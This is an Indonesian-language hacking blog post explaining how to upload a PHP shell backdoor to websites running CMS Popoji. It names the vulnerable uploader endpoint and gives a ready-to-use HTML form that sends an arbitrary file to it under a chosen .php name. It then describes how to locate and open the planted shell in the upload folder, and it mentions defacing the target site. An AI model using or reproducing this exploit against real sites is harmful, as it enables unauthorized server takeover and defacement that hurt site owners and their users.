Sesuai janji Ane. Ane Bakalan Share Gimana Caranya Upload Shell Backdoor Nya Biar Ente Gak Kessahan :D Baik Kan Ane :D.
Pertama Tama Lu Harus Udah Login Ke Web Tersebut Dng Cara Deface CMS Popoji.
Kalo Lu Udah Login langsung Buka Url Bug/Vuln
target.c0li/po-admin/js/plugins/uploader/upload.php
Jika Vuln Maka Akan Terbuka page Yang Ada Tulisnnya
" {"jsonrpc" : "2.0", "result" : null, "id" : "id"} "
CSRF Code :
<form method="post" action="target.c0li/po-admin/js/plugins/uploader/upload.php" enctype="multipart/form-data">
<input type="file" name="file">
<input type="hidden" name="name" value="nama_shell_anda.php">
<input type="submit" value="exploit">
</form>
*Save Dengan Extensi .html Contohnya : rabbids404.html
*Lalu Buka Dengan Browser Kalian Terserah Mozilla Atau Google Chrome Terserah.
Lalu Kalean Upload Shell Kalian Dalam Bentuk jpg (Bukan php.phtml atau Yang Lainnya).
*Save Dengan Extensi .html Contohnya : rabbids404.html
*Lalu Buka Dengan Browser Kalian Terserah Mozilla Atau Google Chrome Terserah.
Lalu Kalean Upload Shell Kalian Dalam Bentuk jpg (Bukan php.phtml atau Yang Lainnya).
Terus Cara Nyari letak Shell Kita Gimna ?
buka folder /po-upload/ , carane bukak url: target.c0li/po-content/po-upload/ , liat list yang kek di SS, carii shell lu, kalo dah ketemu Klik ae ..
kaloo pas folder /po-upload/ nya di buka ternyata muncul notice Forbidden wkkw, silahkan muter otak anda utk mencari backdoor lu wkwk..
Contoh Akses Shell
target/po-content/po-upload/nama_shell_anda-[angka_random]-polibrary.php
Sekian Artikel Upload Shell Backdoor CMS Popoji Dari Ane :D.
Thanks Udah Mengunjungi Blog Ane :D.
Selamat Malam :) Have a Nice Day.
Rabbids404
Selamat Malam :) Have a Nice Day.
Rabbids404
0 Response to "Upload Shell CMS Popoji"
Posting Komentar